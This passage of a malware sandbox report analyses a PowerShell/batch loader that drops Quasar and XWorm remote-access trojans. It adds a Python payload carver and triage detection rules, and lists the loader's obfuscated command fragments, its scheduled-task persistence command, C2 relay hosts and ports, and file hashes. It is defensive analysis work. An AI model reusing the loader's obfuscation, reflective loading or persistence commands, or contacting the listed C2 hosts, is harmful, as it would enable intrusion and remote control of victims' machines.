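stand-in whose ':: ' line carries filler bytes rather than the real encrypted payloads.

```python
"""Offline carver for the AES-CBC/GZip PowerShell loader captured in this report.

Added example, not the sandbox's or the malware author's code.  It replays the
loader's decode chain (FromBase64String -> AES-CBC/PKCS7 -> GZip) over the carrier
.bat so the embedded .NET assemblies land on disk instead of in Assembly.Load.
"""
import base64
import gzip
import re
import sys
from typing import Dict, List

# The loader spells .NET member names backwards and reverses them at run time:
#   [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')(...)  ==  FromBase64String(...)
REVERSED_MEMBER_RE = re.compile(r"\('([^']+)'\[-1\.\.-(\d+)\]\s*-join\s*''\)")


def deobfuscate_members(cmdline: str) -> str:
    """Replace each reversed-string member access with the plain method name."""
    # PowerShell's [-1..-n] yields the last n characters, last one first.
    return REVERSED_MEMBER_RE.sub(lambda m: m.group(1)[::-1][: int(m.group(2))], cmdline)


def loader_params(cmdline: str) -> Dict[str, object]:
    """Recover key, IV and the carrier path the loader reads from its command line."""
    plain = deobfuscate_members(cmdline)
    key = re.search(r"\.Key=\[System\.Convert\]::FromBase64String\('([^']+)'\)", plain)
    iv = re.search(r"\.IV=\[System\.Convert\]::FromBase64String\('([^']+)'\)", plain)
    bat = re.search(r"\[System\.IO\.File\]::ReadAllText\('([^']+)'\)", plain)
    if not (key and iv and bat):
        raise ValueError("command line does not match the known loader layout")
    return {"key": base64.b64decode(key.group(1)),
            "iv": base64.b64decode(iv.group(1)),
            "bat_path": bat.group(1)}


def carve_blobs(bat_text: str) -> List[bytes]:
    """Mirror the loader: first line starting with ':: ', split on '\\', base64-decode."""
    for line in bat_text.splitlines():
        if line.startswith(":: "):
            return [base64.b64decode(part, validate=True) for part in line[3:].split("\\")]
    raise ValueError("no ':: ' carrier line in the batch file")


def decrypt_and_inflate(blob: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-CBC/PKCS7 then GZip, as decrypt_function and decompress_function do.

    Needs the 'cryptography' package (assumed installed); imported lazily so the
    parsing helpers above work without it.
    """
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    if not blob or len(blob) % 16:
        raise ValueError("ciphertext length is not a multiple of the AES block size")
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    unpad = padding.PKCS7(128).unpadder()
    padded = dec.update(blob) + dec.finalize()
    return gzip.decompress(unpad.update(padded) + unpad.finalize())


def carve_payloads(bat_text: str, cmdline: str) -> List[bytes]:
    """Return the decrypted, inflated payloads; refuse anything that is not a PE."""
    params = loader_params(cmdline)
    payloads = []
    for blob in carve_blobs(bat_text):
        data = decrypt_and_inflate(blob, params["key"], params["iv"])
        if data[:2] != b"MZ":  # Assembly.Load expects a PE image
            raise ValueError("decrypted payload is not a PE image")
        payloads.append(data)
    return payloads


# Fragments copied verbatim from the behavioral3 loader command line.
SAMPLE_CMDLINE = (
    "$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')"
    "('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); "
    "$aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')"
    "('IMGBAJCtblcDTdjuAM5M1A=='); "
    "$YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); "
    "$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')"
    r"('C:\Users\Admin\AppData\Roaming\startup_str_134.bat')"
)

# Constructed stand-in for the carrier .bat: the real ':: ' line holds two encrypted
# blobs; here they are 32 and 48 bytes of filler so the carving step can be checked.
SAMPLE_BAT = "\r\n".join([
    "@echo off",
    ":: " + base64.b64encode(b"A" * 32).decode() + "\\" + base64.b64encode(b"B" * 48).decode(),
])

if __name__ == "__main__":
    # usage: carve.py <carrier.bat> <text file holding the captured powershell command line>
    with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
        bat_text = f.read()
    with open(sys.argv[2], encoding="utf-8", errors="replace") as f:
        cmdline = f.read()
    for i, payload in enumerate(carve_payloads(bat_text, cmdline), 1):
        with open(f"payload{i}.bin", "wb") as out:
            out.write(payload)
        print(f"payload{i}.bin: {len(payload)} bytes")
```

With a wrong key or IV the PKCS7 unpad or the GZip header check raises before the MZ test is reached; the MZ test is for a blob that decodes cleanly but is not the PE image Assembly.Load expects. The report's signature hits (Quasar payload, Detect Xworm Payload) suggest the two carved assemblies are the two RAT families; a .NET decompiler on payload1.bin and payload2.bin will confirm which is which, and note that payload 2's Main takes a string[] while payload 1's takes none.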

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
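Read together, the WriteProcessMemory table and the Network table give the whole chain: cmd.exe (4980) runs the .bat; the first loader (2284) registers a logon scheduled task with -RunLevel Highest and launches WScript.exe (5024) on the dropped .vbs; that runs cmd.exe (5008) on the .bat copy under AppData\Roaming, whose loader (1532) starts XClientNOT.exe (3128). The detonation then talks to two *.gl.at.ply.gg hosts on 147.185.221.18:22562 and 147.185.221.19:24820 (ply.gg belongs to the playit.gg tunnelling service, so these are relays rather than the operator's own server) and to api.telegram.org. The rules below are an added example, not part of the report, written over process-creation and connection events constructed from those two tables: command lines are abbreviated to the fragments the rules key on, the network rows carry no PID because the report does not attribute connections to processes, and each list has one constructed benign row the rules must ignore. Each rule checks one trait of the chain: execution-policy bypass, the [-1..-N] -join '' string reversal, reflective Assembly.Load followed by EntryPoint.Invoke, a highest-privilege scheduled task pointing at a .vbs under AppData\Roaming, the wscript -> cmd -> powershell hop, and powershell spawning an .exe from Temp.

```python
"""Triage rules for the process tree and network table in this report.

Added example, not part of the sandbox report.  The events are constructed from
the report's PID chain (Suspicious use of WriteProcessMemory), its command lines
(abbreviated) and its Network table; network rows carry no PID because the
report does not attribute connections to processes.
"""
import re
from typing import Dict, List, Set

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\system32\cmd.exe"
WSCRIPT = r"C:\Windows\System32\WScript.exe"
ROAMING = r"C:\Users\Admin\AppData\Roaming"
# Pieces of the loader command line that the rules key on (copied from the report).
LOADER = ("powershell.exe -noprofile -ep bypass -command ... "
          "[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '') ... "
          "[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); "
          "$WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var); ...")

PROCESS_EVENTS = [
    {"pid": 4980, "ppid": None, "image": CMD,
     "cmdline": r'cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"'},
    {"pid": 2284, "ppid": 4980, "image": PS, "cmdline": LOADER},
    {"pid": 4148, "ppid": 2284, "image": PS,
     "cmdline": "powershell.exe Register-ScheduledTask -TaskName 'RuntimeBroker_startup_134_str' "
                "-Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction "
                "-Execute '" + ROAMING + r"\startup_str_134.vbs') -RunLevel Highest -Force"},
    {"pid": 5024, "ppid": 2284, "image": WSCRIPT,
     "cmdline": '"' + WSCRIPT + '" "' + ROAMING + r'\startup_str_134.vbs"'},
    {"pid": 5008, "ppid": 5024, "image": CMD,
     "cmdline": 'cmd.exe /c ""' + ROAMING + r'\startup_str_134.bat" "'},
    {"pid": 1532, "ppid": 5008, "image": PS, "cmdline": LOADER},
    {"pid": 3128, "ppid": 1532, "image": r"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"'},
    # constructed benign noise: an admin one-liner the rules must leave alone
    {"pid": 700, "ppid": None, "image": PS,
     "cmdline": "powershell.exe -NoProfile -Command Get-Process | Export-Csv C:\\temp\\p.csv"},
]

NETWORK_EVENTS = [  # from the Network table, plus one constructed benign row
    {"domain": "express-divorce.gl.at.ply.gg", "dst": "147.185.221.18:22562"},
    {"domain": "traffic-collins.gl.at.ply.gg", "dst": "147.185.221.19:24820"},
    {"domain": "api.telegram.org", "dst": "149.154.167.220:443"},
    {"domain": "www.example.com", "dst": "203.0.113.10:443"},
]


def _chain(event, by_pid) -> List[str]:
    """Image file names from this process up to the root, e.g. [powershell, cmd, wscript]."""
    names = []
    while event is not None:
        names.append(event["image"].rsplit("\\", 1)[-1].lower())
        event = by_pid.get(event["ppid"])
    return names


def process_hits(events) -> Dict[str, Set[int]]:
    """Map rule name -> PIDs it fired on.  Each rule is one trait of this chain."""
    by_pid = {e["pid"]: e for e in events}
    hits: Dict[str, Set[int]] = {}
    temp_exe = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.I)
    for e in events:
        c, chain = e["cmdline"], _chain(e, by_pid)
        fired = []
        if chain[0] == "powershell.exe":
            if re.search(r"-e(p|xecutionpolicy)\s+bypass", c, re.I):
                fired.append("ps_execution_policy_bypass")
            if re.search(r"'\w+'\[-1\.\.-\d+\]\s*-join\s*''", c):  # reversed member names
                fired.append("ps_reversed_member_name")
            if "[System.Reflection.Assembly]::" in c and ".EntryPoint" in c and ".Invoke(" in c:
                fired.append("ps_reflective_assembly_load")
            if ("Register-ScheduledTask" in c and re.search(r"-RunLevel\s+Highest", c, re.I)
                    and re.search(r"\\AppData\\Roaming\\[^']+\.vbs", c, re.I)):
                fired.append("schtask_highest_runlevel_roaming_vbs")
        if chain[:3] == ["powershell.exe", "cmd.exe", "wscript.exe"]:
            fired.append("wscript_cmd_powershell_chain")  # the .vbs -> .bat -> loader hop
        if chain[1:2] == ["powershell.exe"] and temp_exe.search(e["image"]):
            fired.append("powershell_spawns_temp_exe")
        for rule in fired:
            hits.setdefault(rule, set()).add(e["pid"])
    return hits


def network_hits(events) -> Dict[str, Set[str]]:
    """Map rule name -> domains.  ply.gg hosts belong to the playit.gg tunnel service,
    so the real C2 sits behind a relay on an arbitrary high port."""
    hits: Dict[str, Set[str]] = {}
    for n in events:
        domain, port = n["domain"].lower(), int(n["dst"].rsplit(":", 1)[1])
        if domain.endswith(".ply.gg"):
            hits.setdefault("playit_tunnel_c2", set()).add(domain)
        if domain == "api.telegram.org":  # Telegram Bot API alongside a RAT chain: review
            hits.setdefault("telegram_bot_api", set()).add(domain)
        if port not in (53, 80, 443):
            hits.setdefault("nonstandard_port", set()).add(f"{domain}:{port}")
    return hits


if __name__ == "__main__":
    for rule, pids in process_hits(PROCESS_EVENTS).items():
        print(f"{rule}: {sorted(pids)}")
    for rule, doms in network_hits(NETWORK_EVENTS).items():
        print(f"{rule}: {sorted(doms)}")
```

On real telemetry (Sysmon event 1 or 4688 with command-line auditing, Sysmon event 3 or firewall logs) only the field mapping changes. Match the scheduled task and dropped files on the RuntimeBroker_startup_ and startup_str_ prefixes rather than the full names: the numeric part differs per run (startup_str_880 in behavioral2, startup_str_134 here). The ply.gg suffix and the non-standard ports are the cheapest network indicators; the api.telegram.org connection is worth flagging next to the RAT chain but is not by itself proof of exfiltration.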

Files

memory/2284-2-0x00000233EB4E0000-0x00000233EB502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwzoniql.fwe.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2284-9-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/2284-10-0x00000233EB580000-0x00000233EB590000-memory.dmp

memory/2284-11-0x00000233EB570000-0x00000233EB578000-memory.dmp

memory/2284-12-0x00000233EB790000-0x00000233EB8CA000-memory.dmp

memory/4148-14-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/4148-23-0x000001F43E3D0000-0x000001F43E3E0000-memory.dmp

memory/4148-26-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4ca42e9cc6de90060a4503debda3ea58
SHA1 652f325e5c423876d85ba1a164301ab2d147604b
SHA256 67b7e0001e15e60f1e5c92ce49644ce08500a099fd94135d179b8dfe0513567c
SHA512 38303f1959a2fe056c3cdba1fc775538c21b20364c25154d9f8ca365f3abf8a240b3d3851b8854ddf33a994ae0ef55b6fdaafe695eef658a2386f0c8e05b1e10

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\startup_str_134.vbs

MD5 b05d306b33af9aa7a0d659d7dff16bec
SHA1 229a881e9a1900f05445d18337ea0deee8f8ea6f
SHA256 5bc18b1286fb36a74fe058481326eba5467432eb53a7d73ac89fde8df36ebd07
SHA512 639317b239489750cd1543b265798f323d8b3cb5fac74c54e2cceaf49618ceb02d8e4a8a5e15a8977597eb88f2b6bd13caaac428d85e16f55bfddc386de53bc4

C:\Users\Admin\AppData\Roaming\startup_str_134.bat

MD5 566c653ae6a704041aef596fce6d6a8c
SHA1 da35608bf372a6113d941817a96bc3a17de9ef69
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
SHA512 98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2

memory/1532-43-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/1532-44-0x000002A0733B0000-0x000002A0733C0000-memory.dmp

memory/1532-45-0x000002A0733B0000-0x000002A0733C0000-memory.dmp

memory/2284-47-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/1532-52-0x000002A0739A0000-0x000002A073CC4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

MD5 dd466e4e324143a67a406797c23ee2bc
SHA1 cc369b99c18c9322734b14908e7b21f2bec48118
SHA256 1a87f2fed2a9263e703c44d25da8242016a640db930678a0f497879267c133c8
SHA512 603c082427129deac3bce210d87e3f4125dd429ad7fe13422b7a3d80f8e282ae8ad887a20e47de12a3f90c24ab4a143dc3b069fd8da122f4f96b70f94bd7f438

memory/3128-61-0x00000000009B0000-0x00000000009BE000-memory.dmp

memory/3128-62-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/1532-63-0x000002A073EF0000-0x000002A073F40000-memory.dmp

memory/1532-64-0x000002A074000000-0x000002A0740B2000-memory.dmp

memory/3128-65-0x000000001B6D0000-0x000000001B6E0000-memory.dmp

memory/1532-66-0x000002A074A00000-0x000002A074BC2000-memory.dmp

memory/1532-67-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/1532-68-0x000002A0733B0000-0x000002A0733C0000-memory.dmp

memory/1532-69-0x000002A0733B0000-0x000002A0733C0000-memory.dmp

memory/3128-70-0x00007FFC0BDB0000-0x00007FFC0C872000-memory.dmp

memory/3128-71-0x000000001B6D0000-0x000000001B6E0000-memory.dmp